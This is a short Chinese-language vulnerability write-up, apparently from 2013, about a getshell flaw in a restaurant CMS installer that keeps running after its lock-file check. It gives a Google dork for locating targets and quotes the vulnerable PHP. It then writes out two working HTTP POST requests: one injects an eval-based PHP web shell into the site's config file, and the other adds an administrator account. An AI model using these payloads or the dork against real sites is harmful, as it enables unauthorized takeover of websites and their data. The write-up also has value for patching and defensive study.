餐厅cms getshell漏洞

发布日期:2013-01.04 发布作者:BHST 漏洞类型:代码执行 关键字:inurl:index.php?m=shopcar 问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。 [php] <?php if(file_exists("../install.lock")) { header("Location: ../");//没有退出 } //echo 'tst';exit; require_once("init.php"); if(empty($_REQUEST['step']) || $_REQUEST['step']==1) {[/php] 可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。 1、getshell(很危险) [php] if(empty($_REQUEST['step']) || $_REQUEST['step']==1) { $smarty-&gt;assign("step",1); $smarty-&gt;display("index.html"); }elseif($_REQUEST['step']==2) { $mysql_host=trim($_POST['mysql_host']); $mysql_user=trim($_POST['mysql_user']); $mysql_pwd=trim($_POST['mysql_pwd']); $mysql_db=trim($_POST['mysql_db']); $tblpre=trim($_POST['tblpre']); $domain==trim($_POST['domain']); $str="&lt;?php \r\n"; $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n"; $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n"; $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n"; $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n"; $str.='define("MYSQL_CHARSET","GBK");'."\r\n"; $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n"; $str.='define("DOMAIN","'.$domain.'");'."\r\n"; $str.='define("SKINS","default");'."\r\n"; $str.='?&gt;'; file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件[/php] 上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马  
-----------post---------- POST /canting/install/index.php?m=index&amp;step=2 HTTP/1.1 Host: 192.168.80.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.80.129/canting/install/index.php?step=1 Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42 Content-Type: application/x-www-form-urlencoded Content-Length: 126 mysql_host=test");@eval($_POST[x]);?&gt;//&amp;mysql_user=1&amp;mysql_pwd=2&amp;mysql_db=3&amp;tblpre=koufu_&amp;domain=www&amp;button=%CF%C2%D2%BB%B2%BD ---------post---------- 
但是这个方法很危险,将导致网站无法运行。 2、直接添加管理员 [php] elseif($_REQUEST['step']==5) { if($_POST) { require_once("../config/config.inc.php"); $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD); mysql_select_db(MYSQL_DB,$link); mysql_query("SET NAMES ".MYSQL_CHARSET ); mysql_query("SET sql_mode=''"); $adminname=trim($_POST['adminname']); $pwd1=trim($_POST['pwd1']); $pwd2=trim($_POST['pwd2']); if(empty($adminname)) { echo "&lt;script&gt;alert('管理员不能为空');history.go(-1);&lt;/script&gt;"; exit(); } if(($pwd1!=$pwd2) or empty($pwd1)) { echo "&lt;script&gt;alert('两次输入的密码不一致');history.go(-1);&lt;/script&gt;";//这里也是没有退出 } mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员 }[/php] 这样的话我们就可以直接插入一个管理员帐号,语句如下:
POST /canting/install/index.php?m=index&amp;step=5 HTTP/1.1 Host: 192.168.80.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.80.129/canting/install/index.php?step=1 Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42 Content-Type: application/x-www-form-urlencoded Content-Length: 46adminname=qingshen&amp;pwd1=qingshen&amp;pwd2=qingshen 

发表评论